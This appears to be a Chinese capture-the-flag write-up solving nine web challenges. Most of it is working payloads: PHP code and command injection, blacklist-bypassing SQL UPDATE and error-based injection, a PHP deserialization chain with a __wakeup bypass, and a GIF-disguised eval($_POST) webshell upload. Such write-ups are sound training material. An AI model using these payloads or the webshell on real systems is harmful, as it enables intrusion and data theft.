web
0x01 If_else
注释掉然后构造payload就可以了。
payload:url?check=1){eval(system("cat /flag"));}/*
0x02 RCE-PLUS
rce没有回显,那就重定向到文件访问就可以了。
payload:url?cmd=cat /f*>1.txt
0x03 Pingpingping
php特性,“]”后面的“.”不会被转换。
payload:url?Ping[ip.exe=127.0.0.1;cat /flag
0x04 一键连接!
全部数组绕过,然后data伪协议判断条件,最后执行命令。
payload:
get:url?md5_1[]=1&md5_2[]=0&sha1_1[]=1&sha1_2[]=0&new_player=data://text/plain,Welcome to NSSCTF!!!
post:Nss=system("cat /flag");
0x05 NSS大卖场
sql更新注入,在路径/buy下可以传一个参数
/buy/1,网页就会报错/buy/1',可以回显黑名单
SELECT|select|UPDATE|update|WHERE|where| |or|AND|and|ORDER|order|BY|by|--|<|>|!
这些都是被过滤的,然后网页的hint可以下载数据库的备份文件
CREATE TABLE `items` (
`id` int(11) NOT NULL,
`name` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
`price` int(11) NOT NULL,
`have` int(11) NOT NULL,
`info` longtext CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`) USING BTREE
) ENGINE = MyISAM CHARACTER SET = utf8 COLLATE = utf8_unicode_ci ROW_FORMAT = Dynamic;
-- ----------------------------
-- Records of items
-- ----------------------------
INSERT INTO `items` VALUES (1, 'X尼小熊', 999, 0, '...');
INSERT INTO `items` VALUES (2, 'ICBM火', 999, 0, '...');
INSERT INTO `items` VALUES (3, 'Haruki拖鞋', 999, 0, '...');
INSERT INTO `items` VALUES (4, 'WD鸽毛', 999, 0, '...');
INSERT INTO `items` VALUES (5, '谢队出狱图', 999, 0, '...');
INSERT INTO `items` VALUES (6, 'SC学姐', 999, 0, '...');
INSERT INTO `items` VALUES (7, '探姬女装', 999, 0, '...');
INSERT INTO `items` VALUES (8, 'FLAG', 999999999, 0, 'flag is here');
这里的思路就是利用update语句修改items表里的price字段就可以购买flag了。
绕过黑名单大小写绕过,空格就用%09绕过。
payload:url/buy/1';UPdATE%09items%09SeT%09price=1;#
0x06 NSS_HTTP_CHEKER
http请求头,不难。
get:?this_is_get=get_%1t
post:this_is_post=p03t
cookie:this_is_cookie=cookie_suki_desu~
ua:NSSCTF
xff:127.0.0.1
0x07 UnS3rialize
常规的反序列化,但是最后那里需要绕过wakeup,修改"F":3,把 3 改为 4 就可以了。
poc如下:
<?php
class NSS
{
public $cmd;
}
class C
{
public $whoami;
}
class T
{
public $sth;
}
class F
{
public $user = "nss";
public $passwd = "ctf";
public $notes;
}
$ser = new F();
$ser->user = "SWPU";
$ser->passwd = "NSS";
$ser->notes = new T();
$ser->notes->sth = new C();
$ser->notes->sth->whoami = new NSS();
$ser->notes->sth->whoami->cmd = "ls";
$a = 'O:1:"F":4:{s:4:"user";s:4:"SWPU";s:6:"passwd";s:3:"NSS";s:5:"notes";O:1:"T":1:{s:3:"sth";O:1:"C":1:{s:6:"whoami";O:3:"NSS":1:{s:3:"cmd";s:7:"cat /f*";}}}}';
echo base64_encode($a);
// O:1:"F":3:{s:4:"user";s:4:"SWPU";s:6:"passwd";s:3:"NSS";s:5:"notes";O:1:"T":1:{s:3:"sth";O:1:"C":1:{s:6:"whoami";O:4:"NSS":1:{s:3:"cmd";s:2:"ls";}}}}
payload:url?ser=TzoxOiJGIjo0OntzOjQ6InVzZXIiO3M6NDoiU1dQVSI7czo2OiJwYXNzd2QiO3M6MzoiTlNTIjtzOjU6Im5vdGVzIjtPOjE6IlQiOjE6e3M6Mzoic3RoIjtPOjE6IkMiOjE6e3M6Njoid2hvYW1pIjtPOjM6Ik5TUyI6MTp7czozOiJjbWQiO3M6NzoiY2F0IC9mKiI7fX19fQ==
0x08 ez_talk
传个shell,然后检测文件类型和内容,修改填充一下就好了。
Content-Type: image/png
GIF89a
<?php eval($_POST[x]);
0x09 查查need
sqlmap一把梭,或者手工注入,flag是grade最大的一个值。
payload:student_id=1"+and+updatexml(1,concat(0x7e,(select+mid(MAX(grade),25)+from+school.students),0x7e),1)--+